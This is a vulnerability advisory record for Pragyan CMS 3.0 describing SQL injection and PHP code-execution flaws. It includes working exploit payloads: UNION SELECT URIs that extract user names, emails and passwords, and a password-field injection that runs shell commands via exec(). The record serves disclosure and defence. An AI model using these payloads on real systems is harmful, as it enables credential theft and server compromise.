Sign-up

ID

VAR-E-201102-0493


TITLE

Pragyan CMS SQL Injection and PHP Code Execution Vulnerabilities

Trust: 0.3

sources: BID: 46573

DESCRIPTION

Pragyan CMS is prone to an SQL-injection vulnerability and a code-execution vulnerability because it fails to sufficiently sanitize user-supplied data.
Successfully exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary PHP code in the context of the application.
Pragyan CMS 3.0 rev 274 is vulnerable; other versions may be affected.

Trust: 0.3

sources: BID: 46573

AFFECTED PRODUCTS

vendor:pragyanmodel:cms pragyan cms revscope:eqversion:3.0274

Trust: 0.3

vendor:pragyanmodel:cms pragyan cmsscope:eqversion:3.0

Trust: 0.3

sources: BID: 46573

EXPLOIT

The following example URIs and input are available:
SQL-injection:
http://www.example.com/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,concat(unhex(Hex(cast(@@version as char)))),null,null,null--
http://www.example.com/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,(SELECT concat(0x7e,0x27,unhex(Hex(cast(pragyanV3_users.user_id as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_name as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_email as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_password as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_fullname as char))),0x27,0x7e) FROM `pragyan11`.pragyanV3_users LIMIT 0,1),null,null,null--
PHP code-execution:
password : ");echo exec($_GET["a"]);echo ("

Trust: 0.3

sources: BID: 46573

PRICE

Free

Trust: 0.3

sources: BID: 46573

TYPE

Input Validation Error

Trust: 0.3

sources: BID: 46573

CREDITS

Abhishek Lyall

Trust: 0.3

sources: BID: 46573

EXTERNAL IDS

db:BIDid:46573

Trust: 0.3

sources: BID: 46573

REFERENCES

url:http://sourceforge.net/projects/pragyan/

Trust: 0.3

url:http://bugix-security.blogspot.com/2011/02/pragyan-cms-multipy-vulnerabilities.html

Trust: 0.3

sources: BID: 46573

SOURCES

db:BIDid:46573

LAST UPDATE DATE

2022-07-27T09:19:20.153000+00:00


SOURCES UPDATE DATE

db:BIDid:46573date:2011-02-25T00:00:00

SOURCES RELEASE DATE

db:BIDid:46573date:2011-02-25T00:00:00